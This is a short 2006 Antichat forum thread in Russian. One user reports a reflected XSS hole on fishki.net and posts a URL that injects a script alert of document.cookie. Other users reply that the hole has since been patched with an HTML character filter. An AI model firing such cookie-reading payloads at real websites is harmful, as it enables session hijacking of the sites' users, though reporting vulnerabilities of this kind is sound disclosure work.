XSS на fishki.net.

Discussion in 'Уязвимости' started by 1ten0.0net1, 3 Jul 2006.

  1. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Сам сайт я не юзаю, но у нас в локали он весьма популярен - часто сцыллы проскакивают. Нашел там XSS
    http://fishki.net/calendar1.php?month=08-2006"><script>alert(document.cookie);</script>
     
    #1 1ten0.0net1, 3 Jul 2006
    1 person likes this.
  2. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Или нету КСС, или уже исправили.
    Если все таки она там есть, то лучше перенесите тему вот сюда: https://forum.antichat.ru/thread16507-*fishki*.html
     
    #2 podkashey, 4 Jul 2006
    1 person likes this.
  3. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    все, уязвимость исправлена, поставили фильт по спец. знакам хтмыла... странно, лучше бы они через preg_match организовали образцы...
     
    #3 max_pain89, 4 Jul 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.